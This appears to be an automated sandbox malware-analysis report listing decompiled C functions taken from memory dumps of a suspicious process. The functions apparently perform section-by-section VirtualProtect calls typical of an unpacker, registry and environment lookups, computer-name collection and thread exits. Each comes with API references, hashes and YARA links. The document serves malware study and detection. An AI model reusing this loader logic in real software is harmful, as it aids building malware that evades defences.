
C-Code - Quality: 87%

			E001A1BAE(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x1a3100;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x001a1bb8
0x001a1bc5
0x001a1bcb
0x001a1bd7
0x001a1be7
0x001a1be9
0x001a1bf1
0x001a1c86
0x001a1c8d
0x00000000
0x00000000
0x00000000
0x001a1bf7
0x001a1bf7
0x001a1bf7
0x001a1bfb
0x00000000
0x00000000
0x001a1c07
0x001a1c0b
0x001a1c2f
0x001a1c33
0x001a1c47
0x001a1c47
0x001a1c4d
0x001a1c5c
0x001a1c60
0x001a1c68
0x001a1c68
0x001a1c70
0x001a1c73
0x001a1c80
0x00000000
0x00000000
0x00000000
0x00000000
0x001a1c80
0x001a1c3b
0x001a1c3f
0x001a1c45
0x00000000
0x00000000
0x00000000
0x001a1c45
0x001a1c13
0x001a1c17
0x001a1c21
0x001a1c19
0x001a1c19
0x001a1c19
0x00000000
0x001a1c17
0x00000000

APIs

VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 001A1BE7
VirtualProtect.KERNEL32(00000000,?,?,?), ref: 001A1C5C
GetLastError.KERNEL32 ref: 001A1C62

Memory Dump Source

Source File: 00000011.00000002.525816570.00000000001A1000.00000040.00020000.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000011.00000002.525798200.00000000001A0000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.525835370.00000000001A4000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.525846743.00000000001A6000.00000040.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 66545aa4ee9c76b3ba288bc1017dda2c59c087fa5e51333aa839e78f6c0dbee3
Instruction ID: a5f6caef21eaebea525ffef9c14a5cb64404ee463b8450205f56b4e2210a2f93
Opcode Fuzzy Hash: 66545aa4ee9c76b3ba288bc1017dda2c59c087fa5e51333aa839e78f6c0dbee3
Instruction Fuzzy Hash: B9219F7580020AEFCB18DF84C885AB9F7F4FF19354F01445AE602D7009E3B4AA64CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02CE4A2A, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E02CE4A2A(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E02CE1525(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x2cec284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x02ce4a2e
0x02ce4a3b
0x02ce4a3d
0x02ce4a3e
0x02ce4a46
0x02ce4a46
0x02ce4a4a
0x00000000
0x00000000
0x02ce4a41
0x02ce4a42
0x02ce4a45
0x02ce4a45
0x02ce4a52
0x02ce4a57
0x02ce4a5c
0x02ce4a64
0x02ce4a6a
0x02ce4a6c
0x02ce4a6f
0x02ce4a73
0x02ce4a75
0x02ce4a78
0x02ce4a78
0x02ce4a79
0x02ce4a7b
0x02ce4a78
0x02ce4a85
0x02ce4a88
0x02ce4a8b
0x02ce4a8c
0x02ce4a8e
0x02ce4a95
0x02ce4a95
0x02ce4aa1

APIs

StrChrA.SHLWAPI(?,00000020,00000000,03BA95AC,02CE30F3,?,02CE1173,?,03BA95AC,?,02CE30F3), ref: 02CE4A46
StrTrimA.SHLWAPI(?,02CEC284,00000002,?,02CE1173,?,03BA95AC,?,02CE30F3), ref: 02CE4A64
StrChrA.SHLWAPI(?,00000020,?,02CE1173,?,03BA95AC,?,02CE30F3), ref: 02CE4A6F

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 5a1b1a97125a222843caf36bc5e74bfd06b46631dcf1476ec97026ba904113eb
Instruction ID: cf8467a952c2fe1d3f913354dbb583738438d4f15c472d73fcdbba4dc6380762
Opcode Fuzzy Hash: 5a1b1a97125a222843caf36bc5e74bfd06b46631dcf1476ec97026ba904113eb
Instruction Fuzzy Hash: A301BC72780346AEEF344E6A8C48F677B9DEBC9764F045021BA47CB282DA70D902D764

Uniqueness

Uniqueness Score: -1.00%

Function 6DA72B2E, Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6DA86256: GetLastError.KERNEL32(?,00000016,00000000,6DA77140,00000016,?,6DA771A5,00000000,00000000,00000000,00000000,00000000,6DA85B82,00000000,?,6DA68B88), ref: 6DA8625B
Part of subcall function 6DA86256: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6DA771A5,00000000,00000000,00000000,00000000,00000000,6DA85B82,00000000,?,6DA68B88,00000000,00000000), ref: 6DA862F9

CloseHandle.KERNEL32(?,?,?,6DA72C65,?,?,6DA72AD7,00000000), ref: 6DA72B5F
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,6DA72C65,?,?,6DA72AD7,00000000), ref: 6DA72B75
ExitThread.KERNEL32 ref: 6DA72B7E

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: 81a283148e4cc7b7dbf5d27179b55fab67b9c18fb9a75752d099b983d47ab0bb
Instruction ID: 6368617d39b8dcc036f76044952c3cec56acfc9857beb736becf0ac9fbd016dc
Opcode Fuzzy Hash: 81a283148e4cc7b7dbf5d27179b55fab67b9c18fb9a75752d099b983d47ab0bb
Instruction Fuzzy Hash: 78F05E385086026FDB311F318988B3B3BA96F85360B194714E836C72A4D730D8818A94

Uniqueness

Uniqueness Score: -1.00%

Function 02CE46B2, Relevance: 3.9, APIs: 3, Instructions: 152
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E02CE46B2(void* __eflags, int _a4) {
				signed int _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				char* _v24;
				int _v28;
				void* _v40;
				char _v44;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				void _v88;
				char _v92;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				signed int _t52;
				signed int _t53;
				signed int _t55;
				void* _t67;
				void* _t74;
				void* _t76;
				WCHAR* _t80;
				intOrPtr _t82;

				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t42 =  *0x2ced278; // 0x3ba9d88
				_t5 = _t42 + 0x48; // 0x3ba9f5c
				_t82 =  *_t5;
				_t6 = _t42 + 0x4c; // 0x3ba9f68
				_v16 =  *_t6;
				_t44 =  *0x2ced2a8; // 0xeba5a8
				_t8 = _t44 + 0x2ceee20; // 0x410025
				_t80 = E02CE7F47(_t8);
				_v20 = _t80;
				if(_t80 == 0) {
					_t76 = 8;
					L24:
					return _t76;
				}
				if(StrCmpNIW(_t80, _a4, lstrlenW(_t80)) != 0) {
					_t76 = 1;
					L22:
					E02CE8B22(_v20);
					goto L24;
				}
				_t52 = E02CE155A(0,  &_a4); // executed
				if(_t52 != 0) {
					_a4 = 0;
				}
				_t53 = E02CE7B3B(_t52,  *0x2ced33c);
				_v12 = _t53;
				if(_t53 == 0) {
					_t76 = 8;
					goto L19;
				} else {
					_t55 = E02CE7B3B(_t53, _t82);
					_t84 = _t55;
					if(_t55 == 0) {
						_t76 = 8;
					} else {
						_t74 = E02CE7DDD(_a4, 0x80000001, _v12, _t84,  &_v92,  &_v88); // executed
						_t76 = _t74;
						_t55 = E02CE8B22(_t84);
					}
					if(_t76 != 0) {
						L17:
						E02CE8B22(_v12);
						L19:
						_t83 = _a4;
						if(_a4 != 0) {
							E02CE4FF0(_t83);
						}
						goto L22;
					} else {
						if(( *0x2ced260 & 0x00000001) == 0) {
							L14:
							E02CEA50A(_v88, _v92, _v92,  *0x2ced270, 0);
							_t76 = E02CE5DE9(_v92,  &_v84,  &_v80, 0);
							if(_t76 == 0) {
								_v28 = _a4;
								_v24 =  &_v92;
								_t76 = E02CE6150( &_v44, 0);
							}
							E02CE8B22(_v92);
							goto L17;
						}
						_t67 = E02CE7B3B(_t55, _v16);
						_t86 = _t67;
						if(_t67 == 0) {
							_t76 = 8;
						} else {
							_t76 = E02CE7DDD(_a4, 0x80000001, _v12, _t86,  &_v76,  &_v72);
							E02CE8B22(_t86);
						}
						if(_t76 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x02ce46c4
0x02ce46c7
0x02ce46ce
0x02ce46d4
0x02ce46d5
0x02ce46d6
0x02ce46d7
0x02ce46d8
0x02ce46d9
0x02ce46de
0x02ce46de
0x02ce46e1
0x02ce46e4
0x02ce46e7
0x02ce46ef
0x02ce46fb
0x02ce46fd
0x02ce4702
0x02ce4837
0x02ce483a
0x02ce483e
0x02ce483e
0x02ce471c
0x02ce482a
0x02ce482b
0x02ce482e
0x00000000
0x02ce482e
0x02ce4727
0x02ce472e
0x02ce4730
0x02ce4730
0x02ce4739
0x02ce473e
0x02ce4743
0x02ce4819
0x00000000
0x02ce4749
0x02ce474a
0x02ce474f
0x02ce4758
0x02ce477b
0x02ce475a
0x02ce476a
0x02ce4770
0x02ce4772
0x02ce4772
0x02ce477e
0x02ce480d
0x02ce4810
0x02ce481a
0x02ce481a
0x02ce481f
0x02ce4821
0x02ce4821
0x00000000
0x02ce4784
0x02ce478b
0x02ce47c1
0x02ce47d1
0x02ce47e7
0x02ce47eb
0x02ce47f0
0x02ce47f6
0x02ce4803
0x02ce4803
0x02ce4808
0x00000000
0x02ce4808
0x02ce4790
0x02ce4795
0x02ce4799
0x02ce47bc
0x02ce479b
0x02ce47b1
0x02ce47b3
0x02ce47b3
0x02ce47bf
0x00000000
0x00000000
0x00000000
0x00000000
0x02ce47bf
0x02ce477e

APIs

memset.NTDLL ref: 02CE46C7

Part of subcall function 02CE7F47: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,03BA9F5C,00000000,02CE46FB,00410025,00000005,?,00000000), ref: 02CE7F58
Part of subcall function 02CE7F47: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 02CE7F75

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02CE4709
StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 02CE4714

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID:
API String ID: 3817122888-0
Opcode ID: 3b2699ba2899a41450534498fe42a8aa762bd626861981a885b3ac8be0c8a161
Instruction ID: 1c340cb3a93364cf3fecee9a466175de69f4c266612d50ecb48a5ccd9ccb6a53
Opcode Fuzzy Hash: 3b2699ba2899a41450534498fe42a8aa762bd626861981a885b3ac8be0c8a161
Instruction Fuzzy Hash: EE412B72900258AFDF21AFE4DC84EEEBBBDEF48754F104126EA13EA110D7719A45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02CE76E7, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E02CE76E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02CE8A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x2ced2a8; // 0xeba5a8
						_t20 = _t68 + 0x2cee1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02CEA6BC(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x02ce76ed
0x02ce76f0
0x02ce7700
0x02ce7709
0x02ce770d
0x02ce77db
0x02ce77e1
0x02ce77e1
0x02ce7727
0x02ce772c
0x02ce7730
0x02ce7736
0x02ce773b
0x02ce7742
0x02ce7751
0x02ce7751
0x02ce7755
0x02ce7757
0x02ce7763
0x02ce776e
0x02ce7779
0x02ce777d
0x02ce7787
0x02ce778b
0x02ce778d
0x02ce7792
0x02ce7799
0x02ce77a9
0x02ce77a9
0x02ce7792
0x02ce778b
0x02ce77ab
0x02ce77b0
0x02ce77b5
0x02ce77b5
0x02ce77b8
0x02ce77c1
0x02ce77c6
0x02ce77c6
0x02ce77cb
0x02ce77d0
0x02ce77d0
0x02ce77cb
0x02ce7755
0x02ce77d2
0x02ce77d8
0x00000000

APIs

Part of subcall function 02CE8A19: SysAllocString.OLEAUT32(80000002), ref: 02CE8A76
Part of subcall function 02CE8A19: SysFreeString.OLEAUT32(00000000), ref: 02CE8ADC

SysFreeString.OLEAUT32(?), ref: 02CE77C6
SysFreeString.OLEAUT32(02CE4BD8), ref: 02CE77D0

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: a7134924c1dd68579bd89633724900ca3262cd99c0652b3db5d0c43551cc3519
Instruction ID: 0590d896a123881c1fc7f1120c84f2d544d1d357b07be1d4f5b826808ccc05f2
Opcode Fuzzy Hash: a7134924c1dd68579bd89633724900ca3262cd99c0652b3db5d0c43551cc3519
Instruction Fuzzy Hash: C2313776900118AFCF22DFA4C889C9BBBBAFFC97447154658F9169B220E3319D51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0039A381, Relevance: 3.1, APIs: 2, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000004,00000000), ref: 0039A42E
VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0039A491

Memory Dump Source

Source File: 00000011.00000002.527303081.000000000039A000.00000040.00020000.sdmp, Offset: 0039A000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d291f7dda613586f3fcab883c370d1f3b78de83c783e0fe3e159c4f94bca6355
Instruction ID: b12aeb2f25667f2fe172358a9086b94ff47a92ff4ffcd0ac4149dffc80d20317
Opcode Fuzzy Hash: d291f7dda613586f3fcab883c370d1f3b78de83c783e0fe3e159c4f94bca6355
Instruction Fuzzy Hash: 3741D2B1D00209AFDF01EFE4C886BEDBBB1FF08311F10416AE514AA2A1D7799A51CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0039A380, Relevance: 3.1, APIs: 2, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000004,00000000), ref: 0039A42E
VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0039A491

Memory Dump Source

Source File: 00000011.00000002.527303081.000000000039A000.00000040.00020000.sdmp, Offset: 0039A000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b7272823c8d21d43fb0f6522016be845afb8fd9462853872aa9a1b7199f6e877
Instruction ID: a33ad8fdf19002e8e271be2c17bbe4ecd253b3691173f3ad7a6e2ffd988407a4
Opcode Fuzzy Hash: b7272823c8d21d43fb0f6522016be845afb8fd9462853872aa9a1b7199f6e877
Instruction Fuzzy Hash: DF41C1B1D10209AFDF01EFE4C886BEDBBB1FF08311F10416AE514AA2A1D7795A51CF95

Uniqueness

Uniqueness Score: -1.00%

Function 001A13C4, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001A13C4() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x1a3104;
				if( *0x1a30ec > 5) {
					_t16 = _t15 + 0x1a40f9;
				} else {
					_t16 = _t15 + 0x1a40b1;
				}
				E001A136F(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E001A1862( &_v32,  &_v16,  *0x1a3100 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x1a30f8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E001A1E22(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x1a30f8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E001A1EF4(_t44, _t32 + 4);
						}
					}
					_t25 = E001A1D7E(_v28); // executed
				}
				ExitThread(_t25);
			}

0x001a13ca
0x001a13db
0x001a13e5
0x001a13dd
0x001a13dd
0x001a13dd
0x001a13ec
0x001a13f5
0x001a13fa
0x001a1418
0x001a1474
0x001a141a
0x001a1420
0x001a1426
0x001a1434
0x001a1438
0x001a143f
0x001a1448
0x001a144c
0x001a1452
0x001a1463
0x001a1454
0x001a145a
0x001a145a
0x001a1452
0x001a146b
0x001a146b
0x001a1476

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 001A1420
ExitThread.KERNEL32 ref: 001A1476

Memory Dump Source

Source File: 00000011.00000002.525816570.00000000001A1000.00000040.00020000.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000011.00000002.525798200.00000000001A0000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.525835370.00000000001A4000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.525846743.00000000001A6000.00000040.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: cf8c376887888420c184ccbd66982cc00b8fb53078652498b4082592899ec9b7
Instruction ID: 46240c7140d0230f7e5e7f1b0021af33c715e32b3101867aba251830c793a083
Opcode Fuzzy Hash: cf8c376887888420c184ccbd66982cc00b8fb53078652498b4082592899ec9b7
Instruction Fuzzy Hash: ED11EF76104301BBDB12DFA8CD49E9BB7ECAF4B300F014816F566C74A0EB30EA848B52

Uniqueness

Uniqueness Score: -1.00%

Function 6DA72C58, Relevance: 3.1, APIs: 2, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6DA72B2E: CloseHandle.KERNEL32(?,?,?,6DA72C65,?,?,6DA72AD7,00000000), ref: 6DA72B5F
Part of subcall function 6DA72B2E: FreeLibraryAndExitThread.KERNEL32(?,?,?,?,6DA72C65,?,?,6DA72AD7,00000000), ref: 6DA72B75
Part of subcall function 6DA72B2E: ExitThread.KERNEL32 ref: 6DA72B7E

_free.LIBCMT ref: 6DA86DCC
HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,6DA72AD7,00000000), ref: 6DA86E08

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitThread$AllocCloseFreeHandleHeapLibrary_free
String ID:
API String ID: 4109078009-0
Opcode ID: b61ab35226aede504210bdf47c33a437b5bffed8f334ab88bfbf234fd2bbcc15
Instruction ID: d5ac80407efda8d4f807552c576d128f5483d59d792a5bbc9e9084301e11bdd9
Opcode Fuzzy Hash: b61ab35226aede504210bdf47c33a437b5bffed8f334ab88bfbf234fd2bbcc15
Instruction Fuzzy Hash: F301843B12CA1AB7FB212A16DC04B6B3BAD9BC2674B1E4016EE145B752DF71D8C181E0

Uniqueness

Uniqueness Score: -1.00%

Function 02CE831C, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E02CE831C(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02CE1525(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02CE8B22(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x02ce8321
0x02ce832c
0x02ce832e
0x02ce8334
0x02ce8336
0x02ce833b
0x02ce8344
0x02ce8348
0x02ce8351
0x02ce8355
0x02ce8364
0x02ce8357
0x02ce8358
0x02ce835d
0x02ce835d
0x02ce8355
0x02ce8348
0x02ce836d

APIs

GetComputerNameExA.KERNEL32(00000003,00000000,02CE9C7E,76D7F710,00000000,?,?,02CE9C7E), ref: 02CE8334

Part of subcall function 02CE1525: RtlAllocateHeap.NTDLL(00000000,00000000,02CE1278), ref: 02CE1531

GetComputerNameExA.KERNEL32(00000003,00000000,02CE9C7E,02CE9C7F,?,?,02CE9C7E), ref: 02CE8351

Part of subcall function 02CE8B22: HeapFree.KERNEL32(00000000,00000000,02CE131A,00000000,?,?,00000000), ref: 02CE8B2E

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 6c3d5e5a5a0f973016d56aff7b42cc1d1b7a18fa6a416b92ac6b560664e7bfb3
Instruction ID: 6ea50b8199101c12e766756c4500bbe736f2d9e5a1fbf05c848485d1a4ab640b
Opcode Fuzzy Hash: 6c3d5e5a5a0f973016d56aff7b42cc1d1b7a18fa6a416b92ac6b560664e7bfb3
Instruction Fuzzy Hash: 8FF05466600205BEEF11D69E9C00FAF76FDEBC5660F150155E50AE7144EA70DF01E770

Uniqueness

Uniqueness Score: -1.00%

Function 6DA72A79, Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(6DCA72C0,0000000C), ref: 6DA72A8C
ExitThread.KERNEL32 ref: 6DA72A93

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 6ae9f8877de73c463ffbeba4c608ca241affc5f897c9b929eec075d958fa3192
Instruction ID: 27c9140a569c5d36b93f3a733dcf8721d9739403198ba1b3215948991aa29269
Opcode Fuzzy Hash: 6ae9f8877de73c463ffbeba4c608ca241affc5f897c9b929eec075d958fa3192
Instruction Fuzzy Hash: 5EF0FC7494C205EFDB21AFB0C908B7E37B5FF0A305F154549E50697291DB305980DBA1

Uniqueness

Uniqueness Score: -1.00%

